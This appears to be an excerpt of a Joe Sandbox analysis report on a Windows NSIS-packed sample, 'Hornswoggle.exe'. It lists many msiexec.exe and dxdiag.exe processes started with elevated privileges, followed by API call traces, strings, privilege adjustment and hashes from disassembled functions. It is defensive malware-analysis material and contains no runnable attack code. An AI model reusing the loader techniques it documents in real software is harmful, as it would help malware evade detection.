Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:37:08
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x7ff6068e0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x1c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:37:09
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	08:37:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	08:37:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	08:37:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\dxdiag.exe"
Imagebase:	0xb00000
File size:	222'720 bytes
MD5 hash:	24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.7%
Total number of Nodes:	1276
Total number of Limit Nodes:	37

Executed Functions

Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403250
GetVersion.KERNEL32 ref: 00403256
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
#17.COMCTL32(00000007,00000009), ref: 004032A1
OleInitialize.OLE32(00000000), ref: 004032A8
SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 004032EC
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000020), ref: 00403317
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403414
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403425
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403431
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403445
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040344D
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040345E
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403466
DeleteFileA.KERNELBASE(1033), ref: 0040347A

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

ExitProcess.KERNEL32(?), ref: 00403523
CoUninitialize.COMBASE(?), ref: 00403528
ExitProcess.KERNEL32 ref: 00403549
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
ExitProcess.KERNEL32 ref: 004036EB

Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403409, 0040340E, 00403424, 00403430, 0040343F, 0040344C, 00403458, 00403460, 00403559, 0040356A, 00403575, 00403581, 0040358E, 0040359D, 0040364C
\Temp, xrefs: 0040342B
1033, xrefs: 00403475
error, xrefs: 004035BB
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040323F
TEMP, xrefs: 00403459
TMP, xrefs: 00403461
.tmp, xrefs: 00403570
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 004032DF, 004032E5, 0040349E
Error launching installer, xrefs: 004034E0
NSIS Error, xrefs: 004032CA
UXTHEME, xrefs: 00403273, 00403278, 0040327E
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 00403505
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 004033F9, 004034FA, 004035A4, 004035AD
SeShutdownPrivilege, xrefs: 0040367F
~nsu, xrefs: 00403554
C:\Users\user\Desktop\Hornswoggle.exe, xrefs: 00403606
Low, xrefs: 00403447
", xrefs: 0040333C
C:\Users\user\Desktop, xrefs: 0040357B, 00403580, 004035AC

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\Hornswoggle.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$error$~nsu
API String ID: 3329125770-3248735875
Opcode ID: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
Opcode Fuzzy Hash: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E

Function 004051BA Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405219
GetDlgItem.USER32(?,000003EE), ref: 00405228
GetClientRect.USER32(?,?), ref: 00405265
GetSystemMetrics.USER32(00000002), ref: 0040526C
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
ShowWindow.USER32(?,00000008), ref: 00405308
GetDlgItem.USER32(?,000003EC), ref: 00405329
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
GetDlgItem.USER32(?,000003F8), ref: 00405237

Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

GetDlgItem.USER32(?,000003EC), ref: 0040537A
CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
CloseHandle.KERNELBASE(00000000), ref: 0040538F
ShowWindow.USER32(00000000), ref: 004053B2
ShowWindow.USER32(?,00000008), ref: 004053B9
ShowWindow.USER32(00000008), ref: 004053FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
CreatePopupMenu.USER32 ref: 00405444
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
GetWindowRect.USER32(?,000000FF), ref: 00405479
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
OpenClipboard.USER32(00000000), ref: 004054DE
EmptyClipboard.USER32 ref: 004054E4
GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
GlobalLock.KERNEL32(00000000), ref: 004054F7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
GlobalUnlock.KERNEL32(00000000), ref: 00405524
SetClipboardData.USER32(00000001,00000000), ref: 0040552F
CloseClipboard.USER32 ref: 00405535

Strings

Festremser Setup: Completed, xrefs: 004054AA
t"Q, xrefs: 00405409

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Festremser Setup: Completed$t"Q
API String ID: 590372296-3637661019
Opcode ID: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction ID: 22ae5336f142fb48a9cf727d400d9a9d64ef180589f118636d3b9fd0a83d5397
Opcode Fuzzy Hash: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction Fuzzy Hash: 0FA147B1900208BFDB119FA0DD89EAE7BB9FB08355F00407AFA05B61A0C7B55E51DF69

Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75923410,75922EE0,00000000), ref: 0040572E
lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405776
lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405797
lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040579D
FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 004057AE
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
FindClose.KERNEL32(00000000), ref: 0040586C

Strings

8B, xrefs: 0040575E
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00405705
\*.*, xrefs: 00405770

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$8B$\*.*
API String ID: 2035342205-1054798218
Opcode ID: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
Opcode Fuzzy Hash: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

